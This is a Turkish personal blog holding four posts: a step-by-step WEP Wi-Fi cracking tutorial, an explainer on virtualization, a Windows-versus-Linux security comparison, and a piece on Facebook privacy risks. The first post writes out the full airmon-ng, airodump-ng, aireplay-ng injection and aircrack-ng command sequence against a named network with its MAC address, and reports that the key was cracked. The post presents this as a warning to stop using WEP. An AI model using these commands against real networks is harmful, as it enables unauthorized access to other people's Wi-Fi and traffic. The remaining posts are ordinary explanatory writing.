3 Şubat 2013 Pazar
9 Ocak 2013 Çarşamba
Kablosuz Ağ Şifresi (WEP) Kırma
Son
yıllarda kablosuz ağ kullanımı oldukça arttı. Evlerde, iş yerlerinde, alış
veriş merkezlerinde yani nerdeyse her yerde kablosuz ağlara rastlamak mümkün. Evimizde
ya da iş yerimizde kullandığımız kablosuz ağımız acaba güvende mi? Ya da bu
kablosuz ağımızı şifrelemek için ne kullanıyoruz? Eğer şifreleme için WEP (Wired
Equivalent Privacy) kullanıyorsanız emin olabilirsiniz ki güvende değilsiniz,
çünkü WEP’i kırmak çok kolay. Nasıl mı? Şimdi sırasıyla uygulama yaparak
görelim.
Uygulama
için Backtrack 5 sürümünü kullanacağız. Backtrack 5 hakkında bilgi sahibi olmayan
arkadaşlar verdiğim linkten ya da arama motorlarında aratarak bilgi sahibi
olabilirler.
- Konsol açıp ifconfig yazalım ve ağ kartımıza ait bilgileri görelim:
Ekranda görüldüğü üzere wlan0 olarak
görünen kısım bizim ağ kartımızın bilgileri. Başka makinelerde wlan0
değil de başka bir isim olabilir. (eth0 vb.)
- Eğer ifconfig yazdığımız da MAC adresi bilgisi çıkmazsa ifconfig wlan0 yazalım ve ağ kartımıza ait bilgileri görelim:
Ekranda da gördüğümüz üzere ağ kartımızın
MAC adresi: 00:19:d2:83:f0:a3. MAC adresimizi bir yere yazalım birazdan lazım
olacak.
- Şimdi de ağ kartımızı ortamdaki trafiği dinlemek üzere ayarlayalım. airmon-ng start wlan0 komutu ile dinleme moduna geçebiliriz.
Bu sayede ortamdaki paketleri yakalayıp kırmaya çalışacağız.
Şekilde gördüğümüz üzere bundan sonra
kartımızla işlem yaparken mon0 ismini kullanacağız.
- Şimdi ortamdaki paketlerini toplayacağımız kurbanı bulalım. Bunun için de airodump-ng -c 6 mon0 komutunu kullanacağız.
Bu
komutla 6. Kanaldan yayınlanan paketleri yakalamaya çalışacağız.
Eğer ortamı
dinlediğinizde herhangi bir modem yakalayamazsanız, dinlediğiniz kanalı
değiştirin.(6 yerine 11,9,3,1 vb başka numara yazın) Yukarıda görüldüğü üzere WEP şifresi
kullanan iki tane kablosuz ağ bulduk. Şimdi kendimize bir hedef seçelim ve onun
MAC adresini(BSSID) kaydedelim. Hedef olarak “cigdem” ağını seçtik.
MAC
adresini : 00:1C:A8:D2:DF:B6 bir yere not edelim ileride lazım olacak.
- Konsolda paket yakalamayı durdurduktan sonra şu komutu yazalım: airodump-ng -c 6 --bssid 00:1C:A8:D2:DF:B6 --ivs -w deneme mon0 bu komut sayesinde 6. kanaldaki paketleri toplayıp “deneme” ismindeki bir dosyaya kaydediyoruz.
- Şimdi bu pencere açık kalsın, biz yeni bir konsol açıp şu komutu yazalım aireplay-ng -1 2 -o 10 -q 10 -a 00:1C:A8:D2:DF:B6 -h 00:19:d2:83:f0:a3 mon0 böylece ağda trafik oluşmaya başlayacaktır.
Bu
trafikten elde edeceğimiz veriyi tekrar göndermemiz gerekli. Bunun için yeni
bir konsol penceresi açıp şu komutları yazıyoruz:
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:1C:A8:D2:DF:B6 -h 00:19:d2:83:f0:a3 mon0
Yukarıdaki
ekran çıktığında “y” tuşuna basıp ardından “enter” dediğimizde, paket
topladığımız penceredeki “data” kısmında ciddi bir artış olacaktır. Şimdi
yeteri kadar paket toplanmasını bekleyeceğiz.
Paket sayısı yavaş yavaş artıyor. Üst
kısımdaki #Data yazan bölümde toplanan paket sayısı bizim için önemli. Yaklaşık
50000, 70000 paket topladığımızda kırma işlemi kısa sürede sonuç verecektir.
70000 paket topladık diyelim. Tüm bu işlemler olurken
toplanan paketleri kırmaya başlayabiliriz.
Yeni bir konsol penceresi
açıyoruz, aircrack-ng -a 1
deneme-01.ivs komutunu yazıyoruz. Bu komutla elimizdeki paketleri kırmaya
başlayacağız.
Neden deneme-01.ivs yazdık? Çünkü
paketleri kayıt etmeye başladığımız komutta hatırlarsanız -w deneme diye bir
parametre kullanmıştık. Bu parametre kayıt edilecek dosyayı belirtiyordu.
Backtrack, eski dosyalarla karışmaması için bunun sonuna -01 sayısını ekledi.
Başka bir ağ kırarken aynı ismi kullanırsak bu sefer sonundaki numara -02
olacaktır. Kırma işleminde buna dikkat etmeliyiz.
Sonunda şifre kırıldı ve görev
tamamlandı. Ağ şifresi telefon numarası olduğu için bazı numaralar gizlenmiştir.
Gördüğünüz üzere WEP’i kırmak çok zor bir iş değil. Eğer sizin de şifrenizin
kırılmasını istemiyorsanız WEP KULLANMAYIN..!
Birkaç cümle de şifrenizin öneminden
bahsederek yazımızı tamamlayalım. Şifreniz kırılırsa ne olur? Olabilecek en
basit şey ağınızı başkaları kullanır ve size ağır faturalar ödetir. Eğer sınırsız
paket kullanıyorsanız da ağınızdaki yabancı trafikten dolayı hızınız
düşecektir. Bunlar dışında eğer ağınızı kullanan kişiler daha da kötü
niyetliyse başınıza çok fazla iş açabilirler. Bir başka yazımızda da bunlara
değiniriz.
Confucius der
ki: Duyarsam, bilirim. Görürsem, hatırlarım. Yaparsam, anlarım.
Recep Özbay
09.01.2013
26 Aralık 2012 Çarşamba
Sanallaştırma Nedir? Nasıl Çalışır?
Sanallaştırma, makineyi daha verimli
kullanmak vb amaçlar için sanal makineler(virtual machines) aracılığıyla
fiziksel kaynağı parçalara bölüp kullanma yöntemidir. Sanal makinelerin ilk kez
tanımını yapan Popek ve Golberg’e göre sanal makine “gerçek makinenin etkili,
soyutlanmış bir kopyasıydı”. Yani sanal
makine bilgisayar içinde çalışan bir bilgisayardır diyebiliriz ancak bu sanal
makinenin donanımı da sanaldır.
Üzerinde sanallaştırma olmayan bir
kullanıcıya veya kurumsal ölçekli olarak kullanılan bir sunucuya ait performans,
herhangi bir performans ölçüm programı (Windows işletim sisteminde Görev
Yönetici) ile incelendiğinde İŞLEMCİ ve FİZİKSEL BELLEK kullanımının çoğunlukla
düşük seviyelerde kaldığı görülmektedir. Bilgisayarda bir iş yapıldığında bu
değerler kısa bir süreliğine artmakta ancak iş bittiğinde tekrar eski düşük
seviyelerine dönmektedir. Burada şu soru sorulabilir; acaba bilgisayarlara ait
fiziksel kaynakların atıl kalmayacağı bir havuz sistemi oluşturulsa ve fiziksel
kaynağa ihtiyaç duyan bir işlem yapıldığında işletim sistemi kaynağını bu
havuzdan alıp işi bittiğinde tekrar serbest bıraksa mevcut kaynakların
bilgisayarlar üzerinde gereksiz yere (işlem yapılmayan zamanlarda) tutulmasının
önüne geçilmesi nasıl sağlanır? İşte bu sorunun cevabıdır “Sanallaştırma”.
IBM firmasının 1970’li yıllarda ana bilgisayarlarının
(mainframe) mimarisinden kaynaklanan engelleri aşmak ve maliyetleri düşürmek
için yaptığı çalışmalar sonucu ortaya çıkmıştır. Daha sonra İntel ve AMD
işlemcilerine sanallaştırma için gerekli ayarlamaları yaptı. Bu sayede daha
cazip olan sanallaştırma işlemi büyük firmalar tarafından kullanılmaya
başlandı.
Günümüzde belirgin olarak iki farklı
sanallaştırma mimarisi kullanılmaktadır. Bunlar yazılımsal sanallaştırma ve
donanımsal sanallaştırmadır.
Yazılımsal sanallaştırmada sanal
makine bir işletim sistemi üzerine kurulur ve orada farklı bir katman gibi ev
sahibi(host) işletim sisteminden bağımsız olarak çalışır. Bu yöntemin en büyük
dezavantajı fiziksel kaynak ideal bir şekilde kullanılamadığından
performansının düşük olmasıdır. Bu mimari genelde basit test ortamlarında
kullanılır. Bu mimariyi kullanan sanal makine programları VMware Server, VMware
Workstation, Microsoft Virtual PC, Microsof Virtual Server. Yazılımsal sanallaştırma mimarisi aşağıdaki
şekile bakılırsa daha iyi anlaşılabilir.
Sanal makine yöneticinizin
desteklemesine göre istediğiniz işletim sistemini çalıştırabilirsiniz.
Donanımsal sanallaştırma mimarisinde
ise sanal makine yöneticisi doğrudan donanım üzerine yerleşir yani aradaki ev
sahibi(host) işletim sistemi olmaz. Bu mimarinin en büyük avantajı fiziksel
kaynakları doğrudan kullandığı için daha verimli çalışır ve performansı
yüksektir. Kapsamlı test ortamlarında bu mimari kullanılır. Microsoft Hyper-V,
VMware vSphere ESX/ESXi ve Citrix Xen Server sanal makine programları bu
mimariyi kullanırlar. Donanımsal sanallaştırma mimarisi aşağıdaki resimde
gösterilmiştir.
Sanal Sistemlerin Sanal olmayan Sistemlere göre Avantajları ve
Dezavantajları nelerdir?
Sanal sistemlerin gerçek sistemlere
göre çok fazla avantajları vardır. İlk olarak tekil kullanıcılar için ne gibi
avantajları var ona bakalım. Sanallaştırma tekniği sayesinde bilgisayarlarda
aynı anda farklı işletim sistemi çalıştırabiliriz. Örneğin, Linux işletim
sistemi(İS) kurulu bir bilgisayarda sanal makine sayesinde Windows İS ya da
başka bir işletim sistemi çalıştırabiliriz. Bunun ne gibi avantajı olur? Linux
İS’ de çalıştıramayacağımız programı sanal makine de çalıştırıp
kullanabiliriz. Bunun tam tersi de
geçerlidir. Yani Windows İS kurulmuş olan bir bilgisayarda, sanal makine
sayesinde Linux İS kurup çalıştırabiliriz. Sanal makinelere sayesinde
bilgisayarımızı küçük bir laboratuara çevirip çalışmalar yapabiliriz.
İnternette gezinirken sanal
makineler güvende olmamızı sağlar. Özellikle Windows İS kullanıcılarını
bilgisayarlarına internette gezerken virüs bulaşma ihtimali yüksek olduğu için
sanal makine kullanmak gerçek sistemlerinin korunmasına yardımcı olur. Sanal
makine kullanmanın bir diğer artısı ise şüphe duyduğumuz programları deneyip
kontrol etme olanağı sağlar.
Günümüzde işletim sistemlerinin
yönetimi için bilgisayarın yanına gitmeden, uzaktan erişim protokolleri (Uzak
Masaüstü, SSH, X-Server Sistemler…) ile erişim sağlanabilir ve bu sayede
işletim sistemlerine ihtiyaç duyacağı kadar kaynak tahsis edilebilir. Örneğin
Test-Geliştirme amaçlı işletim sistemine maksimum 6GB RAM ve 2 CPU’ya kadar
kullanım hakkı verilirken, Web Sunucu olarak kullanılacak işletim sistemine
20GB RAM ve 4 CPU’ya kadar kullanım hakkı verilerek ihtiyaca uygun, esnek
performans ataması yapılabilir. Zaman içinde ihtiyaçların değişmesi ile
fiziksel hiçbir müdahale gerektirmeden sanallaştırma yönetimi yazılımı
aracılığıyla kaynak kullanımı oranları değiştirilebilir. Örneğin Web Sunucu
için RAM yetersiz olmaya başladığı anda diğer sistemlere tahsis edilen maksimum
kullanılabilecek RAM miktarı düşürülerek veya hazırda bekletilen RAM kaynağından
Web Sunucuya tahsis edilerek Web Sunucusuna ait performans arttırılabilir. Bu
yöntem aracılığıyla birden fazla sunucu yerine tek bir sunucu temin edilerek
bakım maliyeti, kullanılan elektrik tüketimini düşer. Buna ilaveten tahsis
edilen fiziki alanın küçültülmesi ve kablo karmaşasının azaltılması gibi birçok
avantaj sağlanabilir.
Sanal sistemlerin görüldüğü üzere
her ölçekteki kurumlar için de büyük avantajları vardır. Sanal sistemler
sayesinde kurumlar büyük ve bir o kadar karmaşık olan sistem odalarından
kurtuluyorlar. Bunun yanında bu sistem odalarının soğutma maliyeti de düşüyor
ve doğal olarak elektrik tüketim maliyetleri de düşüyor.
Bir sistem odasında bir sürü
fiziksel sunucu kullanmak yerine sanal sunucular kurmak her açıdan daha
kullanışlıdır. Bir arıza çıktığında sorunu çözmek sanal sunucularda daha
kolaydır. Buna ilaveten sanal sistemlerin yedeklenmesi ve tekrar kurulması
kolay olduğu için bir sorun olduğunda ya da sistem çöktüğünde yeni sistemi
kurmak çok kolay ve hızlıdır. Sanal sistemler donanım özelliklerini düzenlemek
adına da kolaylıklar sağlar.
Sanal sunucu kullanmak firmalara tek
merkezden yönetim olanağı sağlar. Aynı zamanda lisans ücretlerinden de kar
ederler. Özetlemek gerekirse sanal sistemleri kullanmak hem kişilere hem de
kurumlara çok ciddi avantajlar sağlıyor.
Sanallaştırma alanında dikkat çeken belli başlı ürünler
hangileridir? Piyasadaki penetrasyon oranları nedir? Ürünlerin birbirlerine
göre avantaj ve dezavantajları nelerdir? Türkiye’de hangi ürünler
bulunabilmektedir? Hangi ürün tercih edilmelidir.
Sanallaştırmanın avantajlarından
bahsettikten sonra şimdi de bu alanda hangi ürünler var onlarda bahsedelim.
Piyasa da dikkat çeken ürünlerden bazıları şunlar;
VirtualBox(Windows/Linux/Mac, free), Parallels(Windows/Linux/Mac, $79.99),
VMware(Windows/Linux, Basic:Free, Premium:$189), QEMU(Linux, Free), Windows
Virtual PC(Windows, Free).
Bu yazıda en fazla kullanılan Vmware
ve VirtualBox sanal makinelerinden bahsedeceğiz. VMware firmasının hem kişilere
yönelik ücretsiz sanal makinesi VMware player vardır hem de kurumlara yönelik
daha gelişmiş VMware Workstation sanal makinesi vardır. Bunlara ilaveten daha
özelleşmiş farklı ürünleri vardır. Masaüstü ve sunucu/iş istasyonu olarak
kullanılabilen VMware Workstation ve GSX ürünleri bir işletim sistemi üzerinde
çalışır yani yazılımsal sanallaştırma mimarisi kullanır. Buna karşılık ESX
ürünü donanımsal sanallaştırma mimarisin kullanır. VMware sanal makinelerinin
üzerinde kurulu işletim sistemlerine sanal sürücüler sağlaması güzel bir
avantajdır.
Oracle firmasının geliştirmekte
olduğu VirtualBox sanal makinesi masaüstü sanallaştırması için geliştirilmiş
ücretsiz güzel bir üründür. İşletim sistemi üzerinde çalışır yani yazılımsal
sanallaştırma mimarisi kullanılmıştır. Windows, Linux, Mac ve Solaris işletim
sistemleri üzerinde çalışabilen bir sanal makine olması kullanabilirlik adına
bir avantajdır. Açık kodlu bir ürün
olması sebebiyle ihtiyaca göre geliştirilebilir. Bu nedenle JAVA gibi
platformdan bağımsız, işletim sistemi bağımlı bir üründür.
05.09.2012
Recep
Özbay
Referanslar
Hangi işletim sistemi daha güvenli? Windows mu Linux mu?
İşletim sistemleri yazılımcılar
tarafından tasarlanan sistemlerdir. “Hatasız kul olmaz.” kaidesi onlar için de
geçerlidir. O zaman diyebiliriz ki hatasız işletim sistemi olmaz. Hiç kimse
çalışan bir işletim sisteminin yüzde yüz güvenli olduğunu iddia edemez.
İlk olarak inceleyeceğimiz iki
işletim sisteminin dünyadaki kullanım oranlarına bakalım. Dünyanın genelinde
işletim sistemi kullanım oranına bakarsak, %90-93 lük bir kısmı Windows işletim
sistemi kullanırken %0,5-1,0 lik bir kitle Linux işletim sistemini tercih
ediyor.( http://statcounter.com/’daki
verilere göre) Bunun yanında her geçen gün Linux kullanıcı sayısının arttığını
belirtmek gerekir.
Windows işletim sistemi
kullanıcısının çok olması kötü niyetli kişilerin ilgisini Windows’taki
açıklıklara yöneltiyor. Buna ilaveten Windows’un ücretli olması da korsanların
dikkatini çeken diğer bir neden. Durum böyle olunca Windows için yazılan
virüslerin, solucan vb kötü niyetli yazılımların sayısı oldukça fazla oluyor,
bu da güvenlik riskini artırıyor.
Windows’u güvensiz kılan bir diğer
etkende Windows ve yüklediğimiz programlar sistem dosyalarına kolayca
erişebilir ve bunları değiştirebilir çünkü Windows işletim sistemi bu yetkiyi
veriyor. Sistem dosyalarında yapılan değişikler ya da onları silmek işletim
sisteminizin ciddi zarar görmesine ya da göçmesine neden olur. Olaya birde
yayılma açısından bakarsak Windows’ta işlerin daha da kötüye gittiğini
görebiliriz. Windows işletim sistemimizi ele geçiren bir bilgisayar korsanı ağımızdaki
diğer bilgisayarlara da sızabilir ve ya arkadaşlarımızın bilgisayarlarına da
e-posta yoluyla bulaşabilir ve onlara da aynı zararları verebilir.
Microsoft firmasının ekonomik ve
teknik destek gücü ve ya onlar için anti-virüs programı yazan büyük firmalar bu
işletim sisteminin güvenliği için uğraşıyor. Yani Windows’un güvenliği için
ciddi bir destek veriliyor. Windows için güvenlik duvarları vb koruma
yöntemleri geliştiriliyor ama tüm desteğe ve güvenlik önlemlerine rağmen
bilgisayar korsanlarını tamamen durdurmak mümkün olmuyor her geçen gün yeni
açıklıklar buluyorlar.
Linux’a bakacak olursak kullanıcı
kitlesinin az olmasından dolayı kötü niyetli kişilerin çok fazla ilgilenmemesi
şimdilik bir artı olarak görülebilir. Ama son yıllardaki Linux kullanıcısının
artmasından dolayı onun için de virüsler yazılmaya başlandığını söyleyebiliriz.
Linux’u güvenli kılan önemli etken
kullanıcı sayısının az olmasından ziyade yönetici yetkisi olmadan gizli bir iş
yapılamaz sistem dosyalarına zarar verilemez ya da bir program kurulamaz
olmasıdır. Dahası eğer birisi bizim şifremizi(yönetici şifresi ile her şey
yapılabilir) ele geçirmiş olsa bile sadece bize zarar verebilir ama çevremizdekilere
zarar vermek için yayılamaz. Ayrıca
dosya ve klasör izin sisteminin Linux işletim sisteminde kullanıcı/grup temelli
olarak okuma/yazma/çalıştır gibi çeşitli türde yetki verilebilir. Bu yönden
Linux’un daha güvenli olduğunu savunabiliriz.
Windows işletim sistemi ve onun için
yazılan programlar kapalı koddur, ancak
Linux ise bunun aksine açık koddur. Yani
Linux’ta neler olup bittiğini görebiliriz ama Windows kapalı kutu olduğu için
içerde neler yapıldığını bilmiyoruz. Linux’un şeffaf olması güvenlik adına bir
artıdır çünkü kimse Windows’un arka planda bizi takip etmediğini yaptıklarımızı
kayıt altına almadığını iddia edemez.
Linux’un özgür bir yazılım olması
arkasında bir patron olmaması onun sahipsiz olduğu anlamına gelmiyor. Aksine
Linux’un arkasında on binlerce gönüllü olan uzman, amatör bir sürü yazılımcı var,
hatta destekleyen bir sürü ciddi firmalarda var. Bu yüzden bir sürü insan açık
kodlu bu sistemi inceleyebiliyor gelişmesine yardım ediyor. Daha fazla göz daha
fazla hata görür, bu yüzden de Linux’ta açıklık daha az diyebiliriz.
Linux güvenlik adına bir artıyı da
program depolarından dolayı kazanıyor. Eğer bir program indireceğimiz zaman bu
depolardaki programcılar tarafından kontrol edilmiş programları indirirsek
virüs bulaşma tehlikesinden korunmuş oluruz. Windows’ta ise herhangi bir
siteden program indirme olanağı var. Bu nedenle programı indirirken ya da
kurarken sisteme virüs bulaştırma ihtimali çok daha yüksektir.
03.09.2012
Recep Özbay
Kaynaklar
Facebook’da bir üyeyi bekleyen bilgi güvenliği ve mahremiyeti (information security and privacy) tehlikeleri neler olabilir?
Yaklaşık
955 milyon üyesi olan Facebook’un kullanıcılarının birçoğu karşılarındaki bilgi
güvenliği ve mahremiyeti tehlikelerinden habersiz. Bu yazıyı yazmamızın amacı Facebook
kullanıcılarını bu tehlikelerden haberdar etmek ve önlem almalarını sağlamak.
Facebook
kullanıcılarını bekleyen tehlikeleri kullanıcılardan kaynaklanan tehditler ve
Facebook’taki teknik açıklıklardan kaynaklanan sorunlar olarak iki başlık
altında inceleyebiliriz.
İlk olarak sorunların önemli bir kısmını
oluşturan bilinçsiz kullanıcılardan bahsedelim ve başlarına gelebilecek ya da
sebep olabilecekleri tehlikelere bakalım. Bilinçsiz kullanıcıların hiç
düşünmeden kendileri hakkında paylaştıkları bilgiler ve arkadaşları bilinçli
kullanıcı olsa dahi onlar hakkında paylaştıkları bilgiler sosyal mühendislik
yapacak dolandırıcılar için çok güzel bir bilgi havuzudur. Ortamdan gerekli
bilgiyi toplayan hırsızlar kişilere özel tuzaklar hazırlıyor ve onlar hakkında
bilgi sahibi oldukları içinde o bilgiler sayesinde kurbanlarını ikna edip
dolandırıyorlar. Facebook kullanıcıları bu kötü niyetli kişilere fırsat
vermemek için gizlilik ayarlarını çok iyi yapmalılar ve çok iyi tanımadıkları
kişileri arkadaş sayısını artırma adına eklememelidirler. Bundan başka kişinin
paylaştığı siyasi/ideolojik güncellemeler hayatının ilerleyen zamanlarında iş
başvurusu vb durumlarda aleyhinde kullanılabilir.
Facebook’un
yeni uygulamalarından biri olan “Abone Ol” düğmesi sayesinde arkadaşı
olmadığınız kişilerin de güncellemelerini de takip edebilirsiniz ya da birileri
sizin güncellemelerinizi takip edebilir. Bu yüzden kişisel bilgilerinizi
paylaşırken bilginin özel olmasına göre paylaşımı görebilecek kitleyi
sınırlandırmanız gerekmektedir aksi takdirde size özel olan bilgileri
arkadaşlarınız dışındaki kişilere yani abonelerinize açmış olursunuz.
Facebook
kullanıcıları gizlilik ayarlarını yaptıkları için kendilerini güven içinde
hissedebilirler ki bir nebze de olsa doğru sayılır fakat site üzerinde çalışan
uygulamaları kullananlar hariç! Çünkü uygulamaları çalıştırmadan önce bizden
istenen onaylarda birçok şeye izin veriyoruz. Örneğin arkadaş listemize,
kişisel bilgilerimize vb bir sürü hesap bilgilerimize ulaşmalarına, bizim
adımıza başkalarının duvarlarında paylaşımda bulunmalarına izin veriyoruz ve bu
izinler sayesinde bilgi mahremiyeti tehlikesiyle karşı karşıya kalıyoruz.
Yukarıda
örneğini gördüğümüz gibi diğer uygulamaların hepsinde bazı izinler veriyoruz ve
bu izinler de güvenlik açığı oluşmasına sebep oluyor.
Facebook’taki bir diğer
sorun ise “Beğen” hırsızlığı yani “Like” jacking. Bu aldatmaca sahte(fake)
videoların ve fotoğrafların altına ya da bilindik sitelere yerleştirilen “Beğen” butonlarıyla yapılıyor. Siz hoşunuza
giden bir videoyu beğenmek için tıkladığınızda gerçekte arka planda saklı olan
link çalışıyor ve sizin isteğiniz ve bilginiz dışında başka bir işlem
gerçekleşiyor. İşin daha da kötü tarafı beğendiğinizi düşündüğünüz video ya da
resmin duvarınızda paylaşılması sonucu arkadaşlarınız ve onların arkadaşları
arasında hızla yayılmasını sağlıyor. Facebook’un “Beğen” butonunu istediğiniz
yerde kullanmanıza izin vermesi de bu tehlikeyi artırıyor.
Facebook
üyelerinin bilinçsiz kullanımı ya da farkında olmadan likejacking vb
yöntemlerle avlanması dışında birde Facebook’taki teknik açıklıklardan
kaynaklanan bilgi mahremiyeti tehlikeleri de var. Bu açıklıklar sayesinde
kişilerin hesap bilgileri ele geçirilebiliyor ya da arkadaşı olmayan kişiler
fotoğraflarına ulaşabiliyor. Bu güvenlik açıklıkları ortaya çıktıktan sonra
Facebook tarafında kapatılıyor ama iş işten geçmiş oluyor ki zaten bu son
açıklık olmuyor zaman içinde yeni bir gizli giriş kapısı bulunuyor.
Üyeleri bekleyen diğer bir tehlike de kimlik
hırsızlığı saldırısı(pnishing) yöntemi. Kullanıcılara facebook chat programı
üzerinden içinde hileli URL bulunan bir mesaj gönderiliyor ve linki tıklayan
kullanıcını karşısına iframe içindeki saklı giriş formu çıkıyor. Bu yöntemle
bir sürü kullanıcının bilgileri ele geçirilmiştir.
Özetlemek
gerekirse facebook üyeleri gelecek günlerde bilgi mahremiyeti sorunu yaşamak istemiyorlarsa
çok özel bilgilerini resimlerini vs facebook vb sanal ortamlarda paylaşmamaları
gerekmektedir. Paylaştıkları güncellemeleri de kimlerin görebileceği konusunda
dikkatli ve hassas olmalıdırlar.
01.09.2012
Recep Özbay
Recep Özbay
Kaynaklar
Kaydol:
Kayıtlar (Atom)